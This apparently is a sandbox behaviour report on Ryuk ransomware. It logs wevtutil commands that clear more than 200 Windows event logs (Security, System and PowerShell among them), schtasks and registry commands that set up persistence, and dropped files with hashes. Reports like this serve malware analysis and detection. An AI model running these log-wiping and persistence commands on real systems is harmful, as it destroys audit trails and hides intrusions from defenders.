C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sens/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TunnelDriver"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Power"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Render"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ntshrui"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "OAlerts"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Security"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Setup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "System"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "TabletPC_InputPanel_Channel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSetup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSyncEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Windows PowerShell"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "muxencode"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\ProgramData\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\ProgramData\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\ProgramData\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\ProgramData\hrmlog2

MD5 0a44b74e4002fb17645d86e920e84d16
SHA1 569d736c5eceb15a6363218db5d8b0f07a4f26de
SHA256 e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287
SHA512 3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

C:\ProgramData\RYUKID

MD5 d795239d3f1352b71cf422ab8d1173ef
SHA1 a638a77d7113b1809ed104e966c2182804e9f6b2
SHA256 926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298
SHA512 ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 d795239d3f1352b71cf422ab8d1173ef
SHA1 a638a77d7113b1809ed104e966c2182804e9f6b2
SHA256 926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298
SHA512 ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

C:\ProgramData\hrmlog1

MD5 dc7bf0d9a1ff7125f82056b89d6ec12a
SHA1 257be6d31211bbbc4ac39d874d37f342c42a7a11
SHA256 8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6
SHA512 d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
